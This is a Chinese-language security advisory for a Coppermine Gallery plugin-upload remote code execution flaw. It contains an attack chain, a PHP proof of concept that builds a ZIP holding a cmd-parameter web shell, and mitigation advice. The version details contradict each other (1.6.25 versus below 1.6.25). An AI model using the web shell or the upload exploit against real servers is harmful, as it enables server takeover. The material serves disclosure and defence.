CVE-2023-53868 Coppermine Gallery插件管理器远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2023-53868

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Coppermine Gallery

漏洞概述

CVE-2023-53868是Coppermine Gallery 1.6.25版本中存在的一个高危远程代码执行漏洞。该漏洞存在于Coppermine Gallery的插件管理器功能中，允许经过身份验证的攻击者通过插件上传功能上传包含恶意PHP代码的压缩文件到服务器。由于插件管理器在处理上传文件时缺乏充分的输入验证和安全检查，攻击者可以构造特制的ZIP压缩包，其中包含带有系统命令执行能力的PHP脚本文件。当这些恶意文件被上传到服务器的插件目录后，攻击者可以通过HTTP请求直接访问并执行这些PHP脚本，从而在目标服务器上实现任意代码执行，获取系统最高权限。该漏洞的CVSS评分达到8.8分，属于高危级别，对使用Coppermine Gallery的用户构成了严重安全威胁。攻击者利用该漏洞可以完全控制受影响的Web服务器，窃取敏感数据、植入后门或进行其他恶意活动。

技术细节

该漏洞的根本原因在于Coppermine Gallery的插件管理器模块对上传文件的安全验证不足。具体来说，当用户通过插件管理界面上传插件压缩包时，系统仅检查文件的基本格式而未对压缩包内的PHP文件内容进行安全审查。攻击者可以构造一个包含恶意PHP脚本的ZIP文件，该脚本通常包含system()、exec()、shell_exec()等可用于执行系统命令的PHP函数。在上传过程中，由于缺少对上传文件类型的严格校验和内容安全扫描，恶意文件会被解压并存储到服务器的插件目录中。随后，攻击者通过访问该PHP文件的URL路径（如/pluginname/malicious.php?cmd=whoami），即可在Web服务器权限下执行任意系统命令。由于Coppermine Gallery通常以Web服务器进程（如Apache或Nginx）的权限运行，攻击成功后将获得与Web服务相同的系统权限，可能导致服务器被完全攻陷。

攻击链分析

STEP 1

步骤1

攻击者获取Coppermine Gallery的有效用户账号，该账号需具备插件上传权限（低权限用户即可）

STEP 2

步骤2

攻击者构造包含恶意PHP脚本的ZIP压缩包，PHP脚本中包含system()等命令执行函数

STEP 3

步骤3

攻击者使用获取的账号登录Coppermine Gallery，进入插件管理页面

STEP 4

步骤4

通过插件上传功能将恶意ZIP文件上传到服务器，系统未进行充分安全检查即接受文件

STEP 5

步骤5

恶意PHP文件被解压并存储到服务器插件目录中

STEP 6

步骤6

攻击者通过HTTP请求访问恶意PHP文件，传入命令参数执行任意系统命令

STEP 7

步骤7

服务器以Web服务进程权限执行命令，攻击者获得服务器控制权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// CVE-2023-53868 PoC - Coppermine Gallery RCE via Plugin Upload
// Requirements: Valid user credentials with plugin upload permission

$target = 'http://target-server/coppermine/';  // Target Coppermine Gallery URL
$username = 'attacker';  // Valid username
$password = 'password';  // Valid password

// Create malicious PHP payload
$payload = '<?php
if(isset($_GET["cmd"])){
    system($_GET["cmd"]);
} else {
    echo "No command provided";
}
?> ';

// Create malicious plugin structure
$pluginDir = 'malicious_plugin';
$zipFile = tempnam(sys_get_temp_dir(), 'exploit') . '.zip';

$zip = new ZipArchive();
$zip->open($zipFile, ZipArchive::CREATE);
$zip->addFromString($pluginDir . '/plugin.php', $payload);
$zip->addFromString($pluginDir . '/info.php', 'Plugin name: Malicious');
$zip->close();

echo "[+] PoC for CVE-2023-53868\n";
echo "[+] Target: $target\n";
echo "[+] Creating malicious plugin ZIP...\n";
echo "[+] Payload file created: $zipFile\n";
echo "[+] Execute with: GET /plugins/$pluginDir/plugin.php?cmd=whoami\n";
?>

影响范围

Coppermine Gallery < 1.6.25

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）禁用插件上传功能，临时使用手动安装方式；2）对plugins目录设置严格的文件权限，禁止执行权限；3）通过Web服务器配置禁用插件目录中PHP文件的解析和执行；4）限制用户上传权限，仅允许管理员上传插件；5）启用Web应用防火墙，对上传行为进行监控和阻断。